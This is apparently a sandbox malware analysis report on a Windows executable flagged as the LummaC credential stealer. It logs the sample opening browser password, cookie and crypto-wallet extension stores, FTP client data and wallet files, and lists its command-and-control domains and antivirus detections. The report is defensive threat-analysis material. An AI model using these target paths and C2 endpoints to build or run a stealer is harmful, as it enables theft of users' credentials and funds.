                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		851
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory44
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                zi042476Iv.exe53%VirustotalBrowse
                zi042476Iv.exe58%ReversingLabsWin32.Infostealer.Tinba
                zi042476Iv.exe100%AviraTR/Crypt.TPM.Gen
                zi042476Iv.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/1100%Avira URL Cloudmalware
                https://mindhandru.buzz/lf100%Avira URL Cloudmalware
                https://mindhandru.buzz/apip100%Avira URL Cloudmalware
                https://mindhandru.buzz/apizZ100%Avira URL Cloudmalware
                https://mindhandru.buzz/O100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
                https://mindhandru.buzz/K100%Avira URL Cloudmalware
                https://mindhandru.buzz/apix100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high
                  mindhandru.buzz
                  		172.67.165.185
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    scentniej.buzzfalse
                      		high
                      rebuildeso.buzzfalse
                        		high
                        appliacnesot.buzzfalse
                          		high
                          screwamusresz.buzzfalse
                            		high
                            cashfuzysao.buzzfalse
                              		high
                              inherineau.buzzfalse
                                		high
                                prisonyfork.buzzfalse
                                  		high
                                  hummskitnj.buzzfalse
                                    		high
                                    mindhandru.buzzfalse
                                      		high
                                      https://mindhandru.buzz/apifalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabzi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microPzi042476Iv.exe, 00000000.00000003.1381810990.000000000133D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000134A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icozi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://mindhandru.buzz/1zi042476Iv.exe, 00000000.00000002.1619925358.0000000001354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://mindhandru.buzz/zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://mindhandru.buzz/apipzi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://mindhandru.buzz/lfzi042476Iv.exe, 00000000.00000003.1550520984.0000000005CC4000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550598616.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mindhandru.buzz/apizZzi042476Iv.exe, 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brzi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mindhandru.buzz/apixzi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://mindhandru.buzz/dzi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgzi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.c.lencr.org/0zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.i.lencr.org/0zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
